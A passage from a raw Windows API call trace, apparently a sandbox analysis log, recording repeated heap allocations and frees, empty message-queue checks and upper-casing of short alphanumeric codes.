(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a1a) returned 0x3571018 [0260.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0260.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1778 [0260.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0260.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0260.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0260.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0260.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0260.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0260.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0260.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0260.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0260.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0260.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a1a) returned 0x24bf470 [0260.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0260.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0260.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0260.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0260.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0260.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0260.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0260.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0260.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0260.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0260.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0260.237] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0260.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0260.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0260.237] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0260.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0260.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0260.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0260.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0260.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0260.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0260.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0260.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0260.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0260.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0260.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.239] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.239] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.241] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0260.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.241] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.241] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0260.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0260.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.241] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0260.242] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.242] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.242] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.242] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.243] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0260.243] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.244] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0260.244] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.244] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0260.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.244] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.244] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0260.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.245] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0260.245] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.245] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0260.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0260.245] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.246] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.246] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.246] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0260.246] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.246] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.246] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.246] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.247] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0260.247] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 